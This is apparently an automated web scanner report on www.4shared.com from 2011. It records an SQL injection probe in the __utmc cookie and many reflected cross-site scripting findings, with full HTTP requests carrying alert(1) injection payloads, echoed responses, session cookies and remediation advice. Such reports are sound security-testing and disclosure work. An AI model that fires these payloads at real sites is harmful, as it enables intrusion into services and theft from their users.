XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.4shared.com

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

Request 1

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320'%20and%201%3d1--%20; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:46 GMT
Content-Length: 38706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<iframe id='a729069d' name='a729069d' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=4&target=_blank&cb=0.8403259016862198&ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://openx.4shared.com/www/delivery/ck.php?n=aa117342&cb=0.5225984301068964' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=4&cb=0.18010964918736116&n=aa117342&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a></iframe>

</center>
<br /><br />

<div style="border-bottom:dotted 1px #9E9E9E"></div>
<br />
<table cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td>

<table cellpadding="0" cellspacing="0" width="100%">
<tr><td class="boxtl"></td><td class="boxt"></td><td class="boxtr"></td></tr>
<tr>
<td class="boxl"></td>
<td class="boxc" style="padding:5px">

<img alt="" src="/images/spacer.gif" class="warn" hspace="3" align="left" />

The file link that you requested is not valid.

</td>
<td class="boxr"></td>
</tr>
<tr><td class="boxbl"></td><td class="boxb"></td><td class="boxbr"></td></tr>
</table>
<br />
<center>

<a href="http://dc407.4shared.com/download/i6VQkuc5"
onclick="return rotatorRegisterClick(3, true);"><img src="http://static.4shared.com/images/butSync2.gif"
alt="Download 4shared Sync"
title="Download 4shared Sync" width="139"
height="52"/></a>

</center>

<br />

<div style="border-bottom:dotted 1px #9E9E9E">
<br />

</div>

<br />

<div class="small" >
Want to have
...[SNIP]...

Request 2

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320'%20and%201%3d2--%20; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:46 GMT
Content-Length: 38525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<iframe id='a729069d' name='a729069d' src='http://openx.4shared.com/www/delivery/afr.php?zoneid=4&target=_blank&cb=0.6554702248030106&ct0=INSERT_CLICKURL_HERE' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://openx.4shared.com/www/delivery/ck.php?n=aa117342&cb=0.41127708511303995' target='_blank'><img src='http://openx.4shared.com/www/delivery/avw.php?zoneid=4&cb=0.7838254378470499&n=aa117342&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a></iframe>

</center>
<br /><br />

<div style="border-bottom:dotted 1px #9E9E9E"></div>
<br />
<table cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td>

<table cellpadding="0" cellspacing="0" width="100%">
<tr><td class="boxtl"></td><td class="boxt"></td><td class="boxtr"></td></tr>
<tr>
<td class="boxl"></td>
<td class="boxc" style="padding:5px">

<img alt="" src="/images/spacer.gif" class="warn" hspace="3" align="left" />

The file link that you requested is not valid.

</td>
<td class="boxr"></td>
</tr>
<tr><td class="boxbl"></td><td class="boxb"></td><td class="boxbr"></td></tr>
</table>
<br />
<center>

<a href="http://dc153.4shared.com/download/aK3Km2yI/4shared_Desktop_332.exe" onclick="return rotatorRegisterClick(1, true);"><img
src="http://static.4shared.com/images/butDesktop2.gif" alt="Download 4shared Desktop" title="Download 4shared Desktop"
width="139" height="52"/></a>

</center>

<br />

<div style="border-bottom:dotted 1px #9E9E9E">
<br />

</div>

<br />

<div class="small" >
Want to have your own account to share files? 
<b class="red"><a href="http://www.4shared.com/signup.jsp" onclick="return loadAndShowSignUpBox(event, '');">Sign Up</a></b>

...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 123 instances of this issue:

/css/indexm.css [REST URL parameter 1]
/css/indexm.css [REST URL parameter 1]
/css/indexm.css [REST URL parameter 2]
/css/indexm.css [REST URL parameter 2]
/css/main.css [REST URL parameter 1]
/css/main.css [REST URL parameter 1]
/css/main.css [REST URL parameter 2]
/css/main.css [REST URL parameter 2]
/css/mobile20.css [REST URL parameter 1]
/css/mobile20.css [REST URL parameter 1]
/css/mobile20.css [REST URL parameter 2]
/css/mobile20.css [REST URL parameter 2]
/css/style.css [REST URL parameter 1]
/css/style.css [REST URL parameter 1]
/css/style.css [REST URL parameter 2]
/css/style.css [REST URL parameter 2]
/desktop/ [REST URL parameter 1]
/desktop/ [REST URL parameter 1]
/enter.jsp [REST URL parameter 1]
/enter.jsp [REST URL parameter 1]
/enter.jsp [au parameter]
/enterprise/ [REST URL parameter 1]
/enterprise/ [REST URL parameter 1]
/favicon.ico [REST URL parameter 1]
/favicon.ico [REST URL parameter 1]
/icons/16x16/doc.gif [REST URL parameter 1]
/icons/16x16/doc.gif [REST URL parameter 1]
/icons/16x16/doc.gif [REST URL parameter 2]
/icons/16x16/doc.gif [REST URL parameter 2]
/icons/16x16/doc.gif [REST URL parameter 3]
/icons/16x16/doc.gif [REST URL parameter 3]
/icons/16x16/pdf.gif [REST URL parameter 1]
/icons/16x16/pdf.gif [REST URL parameter 1]
/icons/16x16/pdf.gif [REST URL parameter 2]
/icons/16x16/pdf.gif [REST URL parameter 2]
/icons/16x16/pdf.gif [REST URL parameter 3]
/icons/16x16/pdf.gif [REST URL parameter 3]
/icons/16x16/png.gif [REST URL parameter 1]
/icons/16x16/png.gif [REST URL parameter 1]
/icons/16x16/png.gif [REST URL parameter 2]
/icons/16x16/png.gif [REST URL parameter 2]
/icons/16x16/png.gif [REST URL parameter 3]
/icons/16x16/png.gif [REST URL parameter 3]
/images/asf-logo.gif [REST URL parameter 1]
/images/asf-logo.gif [REST URL parameter 1]
/images/asf-logo.gif [REST URL parameter 2]
/images/asf-logo.gif [REST URL parameter 2]
/images/tomcat.gif [REST URL parameter 1]
/images/tomcat.gif [REST URL parameter 1]
/images/tomcat.gif [REST URL parameter 2]
/images/tomcat.gif [REST URL parameter 2]
/images/void.gif [REST URL parameter 1]
/images/void.gif [REST URL parameter 1]
/images/void.gif [REST URL parameter 2]
/images/void.gif [REST URL parameter 2]
/js/'%20+%20img%20+%20' [REST URL parameter 1]
/js/'%20+%20img%20+%20' [REST URL parameter 1]
/js/'%20+%20img%20+%20' [REST URL parameter 2]
/js/'%20+%20img%20+%20' [REST URL parameter 2]
/js/'%20+%20val%20+%20' [REST URL parameter 1]
/js/'%20+%20val%20+%20' [REST URL parameter 1]
/js/'%20+%20val%20+%20' [REST URL parameter 2]
/js/'%20+%20val%20+%20' [REST URL parameter 2]
/js/Jsonp.js [REST URL parameter 1]
/js/Jsonp.js [REST URL parameter 1]
/js/Jsonp.js [REST URL parameter 2]
/js/Jsonp.js [REST URL parameter 2]
/js/UploadModule.js [REST URL parameter 1]
/js/UploadModule.js [REST URL parameter 1]
/js/UploadModule.js [REST URL parameter 2]
/js/UploadModule.js [REST URL parameter 2]
/js/account/AccountFacade.js [REST URL parameter 1]
/js/account/AccountFacade.js [REST URL parameter 1]
/js/account/AccountFacade.js [REST URL parameter 2]
/js/account/AccountFacade.js [REST URL parameter 2]
/js/account/AccountFacade.js [REST URL parameter 3]
/js/account/AccountFacade.js [REST URL parameter 3]
/js/homeScript.jsp [REST URL parameter 1]
/js/homeScript.jsp [REST URL parameter 1]
/js/homeScript.jsp [REST URL parameter 2]
/js/homeScript.jsp [REST URL parameter 2]
/js/index.js [REST URL parameter 1]
/js/index.js [REST URL parameter 1]
/js/index.js [REST URL parameter 2]
/js/index.js [REST URL parameter 2]
/js/loginScript.jsp [REST URL parameter 1]
/js/loginScript.jsp [REST URL parameter 1]
/js/loginScript.jsp [REST URL parameter 2]
/js/loginScript.jsp [REST URL parameter 2]
/js/signup-script.jsp [REST URL parameter 1]
/js/signup-script.jsp [REST URL parameter 1]
/js/signup-script.jsp [REST URL parameter 2]
/js/signup-script.jsp [REST URL parameter 2]
/login.jsp [REST URL parameter 1]
/login.jsp [REST URL parameter 1]
/m/ [REST URL parameter 1]
/m/ [REST URL parameter 1]
/premium.jsp [REST URL parameter 1]
/premium.jsp [REST URL parameter 1]
/remindPassword.jsp [REST URL parameter 1]
/remindPassword.jsp [REST URL parameter 1]
/requestCall.jsp [REST URL parameter 1]
/requestCall.jsp [REST URL parameter 1]
/rest/account/freeSpace [REST URL parameter 1]
/rest/account/freeSpace [REST URL parameter 1]
/rest/account/freeSpace [REST URL parameter 2]
/rest/account/freeSpace [REST URL parameter 2]
/rest/account/freeSpace [REST URL parameter 3]
/rest/account/freeSpace [REST URL parameter 3]
/signup.jsp [REST URL parameter 1]
/signup.jsp [REST URL parameter 1]
/sync/sync.css [REST URL parameter 1]
/sync/sync.css [REST URL parameter 1]
/sync/sync.css [REST URL parameter 2]
/sync/sync.css [REST URL parameter 2]
/icons/16x16/doc.gif [Referer HTTP header]
/icons/16x16/pdf.gif [Referer HTTP header]
/icons/16x16/png.gif [Referer HTTP header]
/images/asf-logo.gif [Referer HTTP header]
/images/tomcat.gif [Referer HTTP header]
/images/void.gif [Referer HTTP header]
/js/'%20+%20img%20+%20' [Referer HTTP header]
/js/'%20+%20val%20+%20' [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.4shared.com/css/indexm.css [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3baf0'-alert(1)-'a5461f0d075 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css3baf0'-alert(1)-'a5461f0d075/indexm.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css3baf0'-alert(1)-'a5461f0d075/indexm.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:35 GMT
Content-Length: 38611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css3baf0'-alert(1)-'a5461f0d075/indexm.css',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fu
...[SNIP]...

2.2. http://www.4shared.com/css/indexm.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4e70"-alert(1)-"dc2712cf856 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cssc4e70"-alert(1)-"dc2712cf856/indexm.css?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssc4e70"-alert(1)-"dc2712cf856/indexm.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:33 GMT
Content-Length: 38615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssc4e70"-alert(1)-"dc2712cf856/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.3. http://www.4shared.com/css/indexm.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 163d3'-alert(1)-'dc0771bb49c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/indexm.css163d3'-alert(1)-'dc0771bb49c?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/indexm.css163d3'-alert(1)-'dc0771bb49c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:47 GMT
Content-Length: 38780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/css/indexm.css163d3'-alert(1)-'dc0771bb49c',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.4. http://www.4shared.com/css/indexm.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9600"-alert(1)-"1a36a1d04bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/indexm.csse9600"-alert(1)-"1a36a1d04bf?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/indexm.csse9600"-alert(1)-"1a36a1d04bf
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:45 GMT
Content-Length: 38785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/indexm.csse9600"-alert(1)-"1a36a1d04bf";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.5. http://www.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daa3d'-alert(1)-'6d4683f78b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cssdaa3d'-alert(1)-'6d4683f78b5/main.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /cssdaa3d'-alert(1)-'6d4683f78b5/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:40 GMT
Content-Length: 38632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/cssdaa3d'-alert(1)-'6d4683f78b5/main.css',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.6. http://www.4shared.com/css/main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 148d7"-alert(1)-"2b21ef84d68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css148d7"-alert(1)-"2b21ef84d68/main.css?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css148d7"-alert(1)-"2b21ef84d68/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:38 GMT
Content-Length: 38809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css148d7"-alert(1)-"2b21ef84d68/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.7. http://www.4shared.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbf19"-alert(1)-"19dccd4f627 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /css/main.cssfbf19"-alert(1)-"19dccd4f627?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /css/main.cssfbf19"-alert(1)-"19dccd4f627
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:54 GMT
Content-Length: 38628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
